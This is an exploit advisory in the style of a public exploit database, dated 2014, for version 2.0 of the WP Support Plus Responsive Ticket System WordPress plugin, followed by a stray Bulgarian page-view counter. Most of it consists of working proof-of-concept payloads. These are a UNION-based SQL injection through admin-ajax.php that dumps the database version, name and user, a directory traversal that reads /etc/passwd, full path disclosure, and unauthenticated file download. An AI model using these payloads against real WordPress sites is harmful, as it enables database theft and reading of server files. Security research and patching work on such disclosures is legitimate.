# Exploit Title: WordPress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities # Google Dork: N/A # Date: 09.09.2014 # Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org # Vendor Homepage - http://wpsuportplus.byethost7.com/ # Software http://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/ # Version: 2.0 # Tested on: PHP Description: This plugin adds to WordPress the features of a complete ticket system with 100% responsive and 100% Ajax functionality. This allows users to submit tickets to report problems or get support on whatever you want. Users can set the status, priority and category of each ticket. Proof of Concept: 1. SQL INJECTION URL : http://localhost/wp-admin/admin-ajax.php METHOD : POST REQUEST : action=openTicket&ticket_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7 * any registered user can successfully execute this request 2. FULL PATH DISCLOSURE a) URL : http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=/var/www/wp-content/uploads/2014/09/file.pdf * full path to the file will be shown to the user after the file has been uploaded b) URL : http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path= * full path will be shown in PHP error message if parameter "path" is empty 3. DIRECTORY TRAVERSAL URL : http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=/etc/passwd * any file from the server can be downloaded by giving parameter "path" the location to the file 4. BROKEN AUTHENTICATION URL : http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=<any file path> * The script "downloadAttachment.php" is accessible for anyone without having to login.Брой прочитания на тази страница: 1366
WordPress WP Support Plus Responsive Ticket System 2.0 Plugin – Multiple Vulnerabilities